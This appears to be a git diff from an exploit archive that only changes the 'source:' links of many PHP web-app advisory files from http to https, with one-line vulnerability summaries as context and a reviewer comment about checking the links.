@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28524.txt b/exploits/php/webapps/28524.txt index 833317469..b5aac0dc9 100644 --- a/exploits/php/webapps/28524.txt +++ b/exploits/php/webapps/28524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28525.txt b/exploits/php/webapps/28525.txt index 309201d75..3a895efec 100644 --- a/exploits/php/webapps/28525.txt +++ b/exploits/php/webapps/28525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28526.txt b/exploits/php/webapps/28526.txt index e49896e74..8f1685fdc 100644 --- a/exploits/php/webapps/28526.txt +++ b/exploits/php/webapps/28526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28527.txt b/exploits/php/webapps/28527.txt index 33da4b9bf..28314ff4d 100644 --- a/exploits/php/webapps/28527.txt +++ b/exploits/php/webapps/28527.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28528.txt b/exploits/php/webapps/28528.txt index 7b624958d..aabbceec8 100644 --- a/exploits/php/webapps/28528.txt +++ b/exploits/php/webapps/28528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28529.txt b/exploits/php/webapps/28529.txt index 0ff4447c7..c2d0ef6bc 100644 --- a/exploits/php/webapps/28529.txt +++ b/exploits/php/webapps/28529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28530.txt b/exploits/php/webapps/28530.txt index 0d7bfa22e..943bba5de 100644 --- a/exploits/php/webapps/28530.txt +++ b/exploits/php/webapps/28530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28531.txt b/exploits/php/webapps/28531.txt index 65076e0da..7bb779194 100644 --- a/exploits/php/webapps/28531.txt +++ b/exploits/php/webapps/28531.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28532.txt b/exploits/php/webapps/28532.txt index 5694d5970..28d45291c 100644 --- a/exploits/php/webapps/28532.txt +++ b/exploits/php/webapps/28532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28533.txt b/exploits/php/webapps/28533.txt index 904531ba3..a250be08e 100644 --- a/exploits/php/webapps/28533.txt +++ b/exploits/php/webapps/28533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28534.txt b/exploits/php/webapps/28534.txt index ca963dbd4..69bfd2e1d 100644 --- a/exploits/php/webapps/28534.txt +++ b/exploits/php/webapps/28534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28535.txt b/exploits/php/webapps/28535.txt index eabe9224b..59dd46ed9 100644 --- a/exploits/php/webapps/28535.txt +++ b/exploits/php/webapps/28535.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28536.txt b/exploits/php/webapps/28536.txt index d5b4d83c0..b9c18bae5 100644 --- a/exploits/php/webapps/28536.txt +++ b/exploits/php/webapps/28536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28537.txt b/exploits/php/webapps/28537.txt index de1c1a1e9..12ea05fee 100644 --- a/exploits/php/webapps/28537.txt +++ b/exploits/php/webapps/28537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28538.txt b/exploits/php/webapps/28538.txt index cf0fdfd12..426d5bea0 100644 --- a/exploits/php/webapps/28538.txt +++ b/exploits/php/webapps/28538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28539.txt b/exploits/php/webapps/28539.txt index f3741f069..5122eea75 100644 --- a/exploits/php/webapps/28539.txt +++ b/exploits/php/webapps/28539.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28540.txt b/exploits/php/webapps/28540.txt index dc3e129d4..d40510e20 100644 --- a/exploits/php/webapps/28540.txt +++ b/exploits/php/webapps/28540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28541.txt b/exploits/php/webapps/28541.txt index e3edb147c..6e804267b 100644 --- a/exploits/php/webapps/28541.txt +++ b/exploits/php/webapps/28541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28543.txt b/exploits/php/webapps/28543.txt index 4c11855db..997a4aeb8 100644 --- a/exploits/php/webapps/28543.txt +++ b/exploits/php/webapps/28543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19992/info +source: https://www.securityfocus.com/bid/19992/info ForumJBC is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28544.txt b/exploits/php/webapps/28544.txt index 697685e80..ec70903d8 100644 --- a/exploits/php/webapps/28544.txt +++ b/exploits/php/webapps/28544.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19994/info +source: https://www.securityfocus.com/bid/19994/info k2News Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28545.txt b/exploits/php/webapps/28545.txt index d1dd0ad45..5ccb02fdd 100644 --- a/exploits/php/webapps/28545.txt +++ b/exploits/php/webapps/28545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28546.txt b/exploits/php/webapps/28546.txt index 66978cb87..c1073e9a6 100644 --- a/exploits/php/webapps/28546.txt +++ b/exploits/php/webapps/28546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28547.txt b/exploits/php/webapps/28547.txt index de646b4c5..c93a7bda6 100644 --- a/exploits/php/webapps/28547.txt +++ b/exploits/php/webapps/28547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28548.txt b/exploits/php/webapps/28548.txt index 5292f5d1d..03f654213 100644 --- a/exploits/php/webapps/28548.txt +++ b/exploits/php/webapps/28548.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28549.txt b/exploits/php/webapps/28549.txt index 857d41516..e388e0d18 100644 --- a/exploits/php/webapps/28549.txt +++ b/exploits/php/webapps/28549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28551.txt b/exploits/php/webapps/28551.txt index dfa7e8329..c45baf042 100644 --- a/exploits/php/webapps/28551.txt +++ b/exploits/php/webapps/28551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28552.txt b/exploits/php/webapps/28552.txt index 5774ac6a9..5aa44f2c6 100644 --- a/exploits/php/webapps/28552.txt +++ b/exploits/php/webapps/28552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28554.txt b/exploits/php/webapps/28554.txt index 713b93921..5687c9c5f 100644 --- a/exploits/php/webapps/28554.txt +++ b/exploits/php/webapps/28554.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28556.txt b/exploits/php/webapps/28556.txt index aaacb0be5..48653116b 100644 --- a/exploits/php/webapps/28556.txt +++ b/exploits/php/webapps/28556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19997/info +source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28565.txt b/exploits/php/webapps/28565.txt index 678bde1fc..c5928aa38 100644 --- a/exploits/php/webapps/28565.txt +++ b/exploits/php/webapps/28565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20001/info +source: https://www.securityfocus.com/bid/20001/info PHP Event Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28567.txt b/exploits/php/webapps/28567.txt index 8ae62b74f..60091b937 100644 --- a/exploits/php/webapps/28567.txt +++ b/exploits/php/webapps/28567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20010/info +source: https://www.securityfocus.com/bid/20010/info NX5Linkx is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28568.txt b/exploits/php/webapps/28568.txt index 9b505cd21..50339bbfd 100644 --- a/exploits/php/webapps/28568.txt +++ b/exploits/php/webapps/28568.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20011/info +source: https://www.securityfocus.com/bid/20011/info NX5Linkx is prone to an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28569.txt b/exploits/php/webapps/28569.txt index 5562cd827..6ee0bafca 100644 --- a/exploits/php/webapps/28569.txt +++ b/exploits/php/webapps/28569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20020/info +source: https://www.securityfocus.com/bid/20020/info ActiveCampaign KnowledgeBuilder is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28571.txt b/exploits/php/webapps/28571.txt index 5a98f9616..69fbf176b 100644 --- a/exploits/php/webapps/28571.txt +++ b/exploits/php/webapps/28571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28572.txt b/exploits/php/webapps/28572.txt index f6a4ff340..39903a2dd 100644 --- a/exploits/php/webapps/28572.txt +++ b/exploits/php/webapps/28572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28573.txt b/exploits/php/webapps/28573.txt index a7de82a3e..1bdc38908 100644 --- a/exploits/php/webapps/28573.txt +++ b/exploits/php/webapps/28573.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20024/info +source: https://www.securityfocus.com/bid/20024/info DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28574.txt b/exploits/php/webapps/28574.txt index f00cbb2a9..daf83c3d6 100644 --- a/exploits/php/webapps/28574.txt +++ b/exploits/php/webapps/28574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20026/info +source: https://www.securityfocus.com/bid/20026/info Blojsom is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28575.txt b/exploits/php/webapps/28575.txt index 7ef79adc3..fabd83698 100644 --- a/exploits/php/webapps/28575.txt +++ b/exploits/php/webapps/28575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20028/info +source: https://www.securityfocus.com/bid/20028/info PhotoPost Pro is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28580.txt b/exploits/php/webapps/28580.txt index 381a4c9d0..805976351 100644 --- a/exploits/php/webapps/28580.txt +++ b/exploits/php/webapps/28580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20040/info +source: https://www.securityfocus.com/bid/20040/info NextAge Cart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28581.txt b/exploits/php/webapps/28581.txt index 804c2bf5d..3af5967a4 100644 --- a/exploits/php/webapps/28581.txt +++ b/exploits/php/webapps/28581.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28582.txt b/exploits/php/webapps/28582.txt index 9a06fed97..20a28a538 100644 --- a/exploits/php/webapps/28582.txt +++ b/exploits/php/webapps/28582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28583.txt b/exploits/php/webapps/28583.txt index 05be82de1..f7479714e 100644 --- a/exploits/php/webapps/28583.txt +++ b/exploits/php/webapps/28583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28584.txt b/exploits/php/webapps/28584.txt index be285d81f..14de69cdb 100644 --- a/exploits/php/webapps/28584.txt +++ b/exploits/php/webapps/28584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. 
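Review bot: the `+source:` line in exploits/php/webapps/28584.txt changes only the URL scheme, and nothing in the hunk records whether the https form of the reference was checked to resolve. 28581.txt through 28584.txt all point at bid/20048, so one check per BID would cover each group of files; please state in the commit message that the rewrite was a mechanical http to https substitution and whether the resulting links were verified.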
diff --git a/exploits/php/webapps/28585.txt b/exploits/php/webapps/28585.txt index bac954064..1142594fd 100644 --- a/exploits/php/webapps/28585.txt +++ b/exploits/php/webapps/28585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28586.txt b/exploits/php/webapps/28586.txt index 85de8eb4b..1b4814c6b 100644 --- a/exploits/php/webapps/28586.txt +++ b/exploits/php/webapps/28586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20048/info +source: https://www.securityfocus.com/bid/20048/info Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28590.txt b/exploits/php/webapps/28590.txt index 71ac1985c..dfe01426f 100644 --- a/exploits/php/webapps/28590.txt +++ b/exploits/php/webapps/28590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20060/info +source: https://www.securityfocus.com/bid/20060/info Hitweb is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28591.php b/exploits/php/webapps/28591.php index 40a6b44ff..1e35e1bdf 100644 --- a/exploits/php/webapps/28591.php +++ b/exploits/php/webapps/28591.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20061/info +source: https://www.securityfocus.com/bid/20061/info PHP-Post is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28592.txt b/exploits/php/webapps/28592.txt index 9b66088ad..91721a96c 100644 --- a/exploits/php/webapps/28592.txt +++ b/exploits/php/webapps/28592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20061/info +source: https://www.securityfocus.com/bid/20061/info PHP-Post is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28594.txt b/exploits/php/webapps/28594.txt index ef227d837..a44121d0a 100644 --- a/exploits/php/webapps/28594.txt +++ b/exploits/php/webapps/28594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20064/info +source: https://www.securityfocus.com/bid/20064/info The 'artmedic links' application is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28598.txt b/exploits/php/webapps/28598.txt index 02b550443..665674ede 100644 --- a/exploits/php/webapps/28598.txt +++ b/exploits/php/webapps/28598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20081/info +source: https://www.securityfocus.com/bid/20081/info IDevSpot BizDirectory is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28599.txt b/exploits/php/webapps/28599.txt index 39bb33687..32b54fd3f 100644 --- a/exploits/php/webapps/28599.txt +++ b/exploits/php/webapps/28599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20084/info +source: https://www.securityfocus.com/bid/20084/info NixieAffiliate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28601.txt b/exploits/php/webapps/28601.txt index a8ad80575..eeffd3e10 100644 
--- a/exploits/php/webapps/28601.txt +++ b/exploits/php/webapps/28601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20090/info +source: https://www.securityfocus.com/bid/20090/info PT News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28603.txt b/exploits/php/webapps/28603.txt index cc7b475e8..8b503bd69 100644 --- a/exploits/php/webapps/28603.txt +++ b/exploits/php/webapps/28603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20104/info +source: https://www.securityfocus.com/bid/20104/info Innovate Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28604.txt b/exploits/php/webapps/28604.txt index f92a07eee..c69aa01ac 100644 --- a/exploits/php/webapps/28604.txt +++ b/exploits/php/webapps/28604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20106/info +source: https://www.securityfocus.com/bid/20106/info eSyndiCat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28611.txt b/exploits/php/webapps/28611.txt index 188ce96cb..970784983 100644 --- a/exploits/php/webapps/28611.txt +++ b/exploits/php/webapps/28611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28612.txt b/exploits/php/webapps/28612.txt index 21440c536..f018e7709 100644 --- a/exploits/php/webapps/28612.txt +++ b/exploits/php/webapps/28612.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28613.txt b/exploits/php/webapps/28613.txt index 2efb831dd..7902f817c 100644 --- a/exploits/php/webapps/28613.txt +++ b/exploits/php/webapps/28613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28614.txt b/exploits/php/webapps/28614.txt index 332cdce67..ff60c9a72 100644 --- a/exploits/php/webapps/28614.txt +++ b/exploits/php/webapps/28614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20115/info +source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28616.txt b/exploits/php/webapps/28616.txt index 6a13762e0..308b2fd45 100644 --- a/exploits/php/webapps/28616.txt +++ b/exploits/php/webapps/28616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20120/info +source: https://www.securityfocus.com/bid/20120/info A.I-Pifou is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28617.txt b/exploits/php/webapps/28617.txt index abf1acafa..22dedcae4 100644 --- a/exploits/php/webapps/28617.txt +++ b/exploits/php/webapps/28617.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28618.txt b/exploits/php/webapps/28618.txt index e4734685a..11da9bac5 100644 --- a/exploits/php/webapps/28618.txt +++ b/exploits/php/webapps/28618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28619.txt b/exploits/php/webapps/28619.txt index de2666a88..59dfad88e 100644 --- a/exploits/php/webapps/28619.txt +++ b/exploits/php/webapps/28619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28620.txt b/exploits/php/webapps/28620.txt index 237a17cfe..a623494ac 100644 --- a/exploits/php/webapps/28620.txt +++ b/exploits/php/webapps/28620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28621.txt b/exploits/php/webapps/28621.txt index 7a9a15850..58f2aa357 100644 --- a/exploits/php/webapps/28621.txt +++ b/exploits/php/webapps/28621.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28622.txt b/exploits/php/webapps/28622.txt index 748f7738a..544a2ce9d 100644 --- a/exploits/php/webapps/28622.txt +++ b/exploits/php/webapps/28622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28623.txt b/exploits/php/webapps/28623.txt index 206c812d6..594d493c9 100644 --- a/exploits/php/webapps/28623.txt +++ b/exploits/php/webapps/28623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28624.txt b/exploits/php/webapps/28624.txt index df443f366..c41796e7c 100644 --- a/exploits/php/webapps/28624.txt +++ b/exploits/php/webapps/28624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28625.txt b/exploits/php/webapps/28625.txt index 986ec58d6..7129a91d2 100644 --- a/exploits/php/webapps/28625.txt +++ b/exploits/php/webapps/28625.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28626.txt b/exploits/php/webapps/28626.txt index db3a93c4a..10ba7093b 100644 --- a/exploits/php/webapps/28626.txt +++ b/exploits/php/webapps/28626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28627.txt b/exploits/php/webapps/28627.txt index dcab0a6b8..86022ea29 100644 --- a/exploits/php/webapps/28627.txt +++ b/exploits/php/webapps/28627.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28628.txt b/exploits/php/webapps/28628.txt index 8382f9605..88231e4a0 100644 --- a/exploits/php/webapps/28628.txt +++ b/exploits/php/webapps/28628.txt @@ -1,4 +1,4 @@ 